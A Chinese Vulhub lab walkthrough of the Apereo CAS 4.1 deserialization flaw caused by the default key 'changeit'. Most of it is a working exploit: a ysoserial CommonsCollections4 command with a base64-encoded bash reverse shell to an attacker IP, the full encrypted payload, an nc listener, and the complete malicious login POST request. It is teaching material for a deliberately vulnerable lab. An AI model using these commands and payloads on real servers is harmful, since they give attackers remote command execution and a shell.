Vulhub 漏洞学习之:Apereo CAS

1 Apereo CAS 4.1 反序列化命令执行漏洞

Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥 changeit 我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。

1.1 漏洞利用过程

  1. 利用工具下载地址:

    vulhub/Apereo-CAS-Attack: WIP: Demo for Attacking Apereo CAS (github.com)

  2. 使用 ysoserial 的 CommonsCollections4 生成加密后的 Payload:

    java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxMC4xLzIzMzMgMD4mMSAg}|{base64,-d}|{bash,-i}"

# 生成的Payload:
    
698a7aef-16a0-45d5-aa97-108c89d6b0dc_AAAAIgAAABDrFY%2BzRx4OYupIHw6dbukvAAAABmFlczEyOIryxfU4%2F5s31fKP4GgWb6z6b14lIEyerfBT%2FTenVbCA6pQ8N7S65OmrK9n0FmcBQuNBKYnRwA58Qbfe4mee2tOwTYpITZfxPCc7c37F%2FPjZ%2BElUqsiyjyMSwPmDiR8ENVcN69G%2FoTU1o0dx82%2BfYvBiavbLkZb0ja4bF68RlaDYeKDurglJ8w6UdQXFmIVgB7OdToI2BI15sKPzc33Zt2eiSbxT3ipjIfz5llnafryA%2FRxdpVtHQBDNVEGPdglrSSIS%2FKY5q3wrYgSnHPcuuspd57ujMEVE8tZfy5EH3x3ZfIcV5UDT%2BQxgOuh%2Fb0DYXTScAIxXKDBRfM4EaUZcy62T8zjcbQ%2BGGUKR0vl1tCqPu8SR%2BGq4TNbcX%2BS88qlv2jBVspPw1NpEDSjpC1d2l%2Fwlr2coGfeliMYO5NfJpRvUvUcBhZktTYu4B1PHU%2BvLx3hZ%2FBiT7s%2BZFy6UsjG1nK2dXe2dCm9lO2BMvdsUpDBIyuGqYVdGp7ODox6jrsCRHWKDfaLwGxPtiogs4SttrV2W%2FFug22%2BRP072a%2Fz7Tzfkx%2FWnnUl0y1YgzagHtb5eAWiRE4G60pzVrLW1IT1CrqbMbz2bVGmd4de8YpG7fUrdFRpR%2FyrGmfeS6XEFpkfCpVUfjdpb%2FdBWy0hKZaW7RhbqqrYoldsip74FMEY%2Bne3JbErO8gMKDld3MMonk7PDIcARJdVTvl9jlqfpLThxh3jE1LJ1LTi3a%2BfyhS41GskI6AfrzEMCvezNMbxbEXNUILmr6ZFTFyYFHYxOb1Wdb3IXu%2Bzzq0efLzCyr56aVmx6LsclwN4o%2FDW7e%2FsmgOqzvYeqWsNCxfOHts6cI1YyE%2FDe4FA1hipuxHHPuN6ooeZSZJFuFb79NwmUuHd6B1Iv7J4Qr%2BZhnWZE5Betnh%2BEIQuj%2B7Qy55hkp36DTCkIcjW4sBFLBOGqoYjpJ8dduoG%2FvXrTjUEwusrDrDpAWeu%2BCpHXQeunLrnAQdWJyWVsgjwv%2BdmF4ixRbiIF6JhXUKY6ZEP6K8fd5E0gMB0EFwiu1JiZlUcxhHI%2F7EQZhla2buIbHedhbTXauOmnm7HCSNOfqYb4Vdu%2BA8O8pKs8E9ACvlVkxv2MpFJzZVFHyALWDFrhgRf4kei7FucRlFmpGJnhUzwrrjeQDNsvbMG10I65KFFMJ6EJPKPCZ0QQwsggrgKTK%2FBtS1NMT%2BzYSLiKGRZa1h5Gz11k8%2BPuOU64jMwEcmYofUhe010ayHGun81eXUWShRrKQyw%2FAw871OZd1JX9QOd%2FClfnPZh4mHKiDwFQ7YWJWZ35mgZbM%2FELVT29bYj9BbpZWNOjEurhLgHHYs3Tim%2BqeeKe16%2BxTZHniO%2BSwQPxCFJuIsMzuT%2BSQx5YFuOKo2HsqN2Htku2NaZhxQc8zCtar1hoobB%2BDP5FoVkp5nPvl2%2BeSEfDLZ%2Fuzmzf2zfthRD%2BEavuecVGIsKNRXhFYI%2BCpF8PFaYbWlufKHv13Rl5sv35N12OQ7716Bh2fvhSkfrSKS1iujPXHTlMSfHxofBq0rrdq6QVXw0UNXruse3ChYKa1t8MPa4ZEECOlViw5b3svdp3vWOKaOFJtOSr1SQznVSS9afrWNiOr3GLRXwKTguKJ7ONBcniPyR2Gb1EV7B%2F42MvCzCXf6xkrPWriCC0occu6F%2Fc4qSzFH9XWOyweol9pNz0BCNviFQyWefFYd%2Bi%2B268z5SJrkHDaj1n06mOrfj%2FP655E8GE8iX0P%2BbQX1N4hx70WljY409ey1cGXWubLY5aUsMLCoNLddk3fNgeZhxqHDGSfF72QPnSfyDGAUrYw8dgVqu%2BJz8VXMuQVt9pjVP4RUVzOEg4EfxkQpnTvdOFgzEMM4yDtL9nrFDmUEwwBp0jIQB7tZr1O7Vn%2FoVSdg9WNt8L5QrSFLSJjjOqbYvXe5dyJbDvmgdyHrqNvpoBaSZ6LQZE4hODQvlTq%2Fa01WwPuBPOpgrZ9pDUdJlXZVcMobHabzwKWUwrLw47nkPuZfRVxon86I3fSgUoipZXc%2F05%2B4SBFWlQc23mwbBaOSGTOPs8i7AxJAdIwFg%3D

  3. 攻击主机上配置反弹 Shell 的监听端口

    nc -nvlp 233

  4. 登录 CAS 并抓包,将 Body 中的 execution 值替换成上面生成的 Payload 发送:

    POST /cas/login HTTP/1.1
    
Host: 192.168.210.13:8080
    
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
    
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    
Accept-Encoding: gzip, deflate
    
Content-Type: application/x-www-form-urlencoded
    
Content-Length: 2409
    
Origin: http://192.168.210.13:8080
    
Connection: close
    
Referer: http://192.168.210.13:8080/cas/login
    
Cookie: JSESSIONID=5218B8849824E33F5690C56591A166FF; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en
    
Upgrade-Insecure-Requests: 1

username=test&password=test&lt=LT-239-RcoioBE6g9Bc74RfcMq5SMdbSWTzaW-cas01.example.org&execution=698a7aef-16a0-45d5-aa97-108c89d6b0dc_AAAAIgAAABDrFY%2BzRx4OYupIHw6dbukvAAAABmFlczEyOIryxfU4%2F5s31fKP4GgWb6z6b14lIEyerfBT%2FTenVbCA6pQ8N7S65OmrK9n0FmcBQuNBKYnRwA58Qbfe4mee2tOwTYpITZfxPCc7c37F%2FPjZ%2BElUqsiyjyMSwPmDiR8ENVcN69G%2FoTU1o0dx82%2BfYvBiavbLkZb0ja4bF68RlaDYeKDurglJ8w6UdQXFmIVgB7OdToI2BI15sKPzc33Zt2eiSbxT3ipjIfz5llnafryA%2FRxdpVtHQBDNVEGPdglrSSIS%2FKY5q3wrYgSnHPcuuspd57ujMEVE8tZfy5EH3x3ZfIcV5UDT%2BQxgOuh%2Fb0DYXTScAIxXKDBRfM4EaUZcy62T8zjcbQ%2BGGUKR0vl1tCqPu8SR%2BGq4TNbcX%2BS88qlv2jBVspPw1NpEDSjpC1d2l%2Fwlr2coGfeliMYO5NfJpRvUvUcBhZktTYu4B1PHU%2BvLx3hZ%2FBiT7s%2BZFy6UsjG1nK2dXe2dCm9lO2BMvdsUpDBIyuGqYVdGp7ODox6jrsCRHWKDfaLwGxPtiogs4SttrV2W%2FFug22%2BRP072a%2Fz7Tzfkx%2FWnnUl0y1YgzagHtb5eAWiRE4G60pzVrLW1IT1CrqbMbz2bVGmd4de8YpG7fUrdFRpR%2FyrGmfeS6XEFpkfCpVUfjdpb%2FdBWy0hKZaW7RhbqqrYoldsip74FMEY%2Bne3JbErO8gMKDld3MMonk7PDIcARJdVTvl9jlqfpLThxh3jE1LJ1LTi3a%2BfyhS41GskI6AfrzEMCvezNMbxbEXNUILmr6ZFTFyYFHYxOb1Wdb3IXu%2Bzzq0efLzCyr56aVmx6LsclwN4o%2FDW7e%2FsmgOqzvYeqWsNCxfOHts6cI1YyE%2FDe4FA1hipuxHHPuN6ooeZSZJFuFb79NwmUuHd6B1Iv7J4Qr%2BZhnWZE5Betnh%2BEIQuj%2B7Qy55hkp36DTCkIcjW4sBFLBOGqoYjpJ8dduoG%2FvXrTjUEwusrDrDpAWeu%2BCpHXQeunLrnAQdWJyWVsgjwv%2BdmF4ixRbiIF6JhXUKY6ZEP6K8fd5E0gMB0EFwiu1JiZlUcxhHI%2F7EQZhla2buIbHedhbTXauOmnm7HCSNOfqYb4Vdu%2BA8O8pKs8E9ACvlVkxv2MpFJzZVFHyALWDFrhgRf4kei7FucRlFmpGJnhUzwrrjeQDNsvbMG10I65KFFMJ6EJPKPCZ0QQwsggrgKTK%2FBtS1NMT%2BzYSLiKGRZa1h5Gz11k8%2BPuOU64jMwEcmYofUhe010ayHGun81eXUWShRrKQyw%2FAw871OZd1JX9QOd%2FClfnPZh4mHKiDwFQ7YWJWZ35mgZbM%2FELVT29bYj9BbpZWNOjEurhLgHHYs3Tim%2BqeeKe16%2BxTZHniO%2BSwQPxCFJuIsMzuT%2BSQx5YFuOKo2HsqN2Htku2NaZhxQc8zCtar1hoobB%2BDP5FoVkp5nPvl2%2BeSEfDLZ%2Fuzmzf2zfthRD%2BEavuecVGIsKNRXhFYI%2BCpF8PFaYbWlufKHv13Rl5sv35N12OQ7716Bh2fvhSkfrSKS1iujPXHTlMSfHxofBq0rrdq6QVXw0UNXruse3ChYKa1t8MPa4ZEECOlViw5b3svdp3vWOKaOFJtOSr1SQznVSS9afrWNiOr3GLRXwKTguKJ7ONBcniPyR2Gb1EV7B%2F42MvCzCXf6xkrPWriCC0occu6F%2Fc4qSzFH9XWOyweol9pNz0BCNviFQyWefFYd%2Bi%2B268z5SJrkHDaj1n06mOrfj%2FP655E8GE8iX0P%2BbQX1N4hx70WljY409ey1cGXWubLY5aUsMLCoNLddk3fNgeZhxqHDGSfF72QPnSfyDGAUrYw8dgVqu%2BJz8VXMuQVt9pjVP4RUVzOEg4EfxkQpnTvdOFgzEMM4yDtL9nrFDmUEwwBp0jIQB7tZr1O7Vn%2FoVSdg9WNt8L5QrSFLSJjjOqbYvXe5dyJbDvmgdyHrqNvpoBaSZ6LQZE4hODQvlTq%2Fa01WwPuBPOpgrZ9pDUdJlXZVcMobHabzwKWUwrLw47nkPuZfRVxon86I3fSgUoipZXc%2F05%2B4SBFWlQc23mwbBaOSGTOPs8i7AxJAdIwFg%3D&_eventId=submit&submit=LOGIN

  5. 成功反弹 Shell,说明命令已经成功执行

Vulhub 漏洞学习之:Apereo CAS的更多相关文章

  1. Apereo CAS 4.1 反序列化命令执行漏洞

    命令执行 java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success&q ...

  2. CAS 之 Apereo CAS 简介(一)

    CAS 之 Apereo CAS 简介(一) Background(背景) 随着公司业务的不断扩展,后台接入子系统不断增多,那么我们将针对不同的平台进行拆分为各自对应的子系统, 权限是不变的,那么我们 ...

  3. vulhub漏洞环境

    0x00 vulhub介绍 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更 ...

  4. FastJson远程命令执行漏洞学习笔记

    FastJson远程命令执行漏洞学习笔记 Fastjson简介 fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean.fastjson.ja ...

  5. XSS漏洞学习笔记

    XSS漏洞学习 简介 xss漏洞,英文名为cross site scripting. xss最大的特点就是能注入恶意的代码到用户浏览器的网页上,从而达到劫持用户会话的目的. 说白了就是想尽办法让你加载 ...

  6. Apereo CAS - 1

    1. download  cas 4.2.2 from https://github.com/apereo/cas/releases 2. eclipse import cas 4.2.2 eclip ...

  7. Typecho-反序列化漏洞学习

    目录 Typecho-反序列化漏洞学习 0x00 前言 0x01 分析过程 0x02 调试 0x03 总结 0xFF 参考 Typecho-反序列化漏洞学习 0x00 前言 补丁: https://g ...

  8. CAS 5.x搭建常见问题系列(3).Failure to find org.apereo.cas:cas-server-support-pm-jdbc:jar:5.1.9

    错误内容 cas overlay的pom.xml增加了cas-server-support-pm-jdbc.jary依赖后, 打包(mvn package)出现如下的报错 D:\casoverlay\ ...

  9. apereo cas 小记01--服务器搭建01

    ---恢复内容开始--- github repository:  apereo/cas 一,获取项目 链接:https://github.com/apereo/cas-overlay-template ...

  10. ubuntu搭建vulhub漏洞环境

    0x01 简介 Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译.运行一个完整的漏洞靶场镜像.旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身. ...

随机推荐

  1. vulnhub靶场之HACKSUDO: THOR

    准备: 攻击机:虚拟机kali.本机win10. 靶机:hacksudo: Thor,下载地址:https://download.vulnhub.com/hacksudo/hacksudo---Tho ...

  2. 《HTTP权威指南》– 3.HTTP方法和状态码

    常见HTTP方法: 常用HTTP方法 描述 是否包含主体 GET 从服务器获取一份文档 否 HEAD 只从服务器获取文档的首部 否 POST 向服务器发送需要处理的数据 是 PUT 将请求的主体部分存 ...

  3. Jmeter之逻辑控制器---while控制器

    while控制器与编程语言中的while语句一样,当条件为真时继续执行,不为真时则跳出while循环体,不再执行. while控制器相对于循环控制器来说多了个条件判断,下面为while控制器使用案例. ...

  4. week_3

    Andrew Ng机器学习笔记 Week_3 -- -Logistic Regression This week, we'll be covering logistic regression. Log ...

  5. 基于 Traefik 的激进 TLS 安全配置实践

    前言 Traefik是一个现代的HTTP反向代理和负载均衡器,使部署微服务变得容易. Traefik可以与现有的多种基础设施组件(Docker.Swarm模式.Kubernetes.Marathon. ...

  6. 深度学习之Transformer网络

    [博主使用的python版本:3.6.8] 本次没有额外的资料下载 Packages ort tensorflow as tf import pandas as pd import time impo ...

  7. 【转载】EXCEL VBA Workbook、Worksheet、Range的选择和操作

    Workbooks对象是Microsoft Excel 应用程序中当前打开的所有 Workbook 对象的集合.有close.add.open等方法.   Workbooks.close        ...

  8. [seaborn] seaborn学习笔记12-绘图实例(4) Drawing example(4)

    文章目录 12 绘图实例(4) Drawing example(4) 1. Scatterplot with varying point sizes and hues(relplot) 2. Scat ...

  9. [cocos2d-x]关于动画

    声明一下:看见这篇文章总结的已经非常好了,没必要再去自己到处东翻西找了,链接:http://shahdza.blog.51cto.com/2410787/1546998 [唠叨] 基本动画制作需要用到 ...

  10. Spring MVC的运行流程

    Spring MVC的运行流程 摘要:本文档主要结合官方给出的Spring MVC流程图结合一个简单的Spring MVC实例,分析并介绍了Spring MVC的运行流程. 目录 Spring MVC ...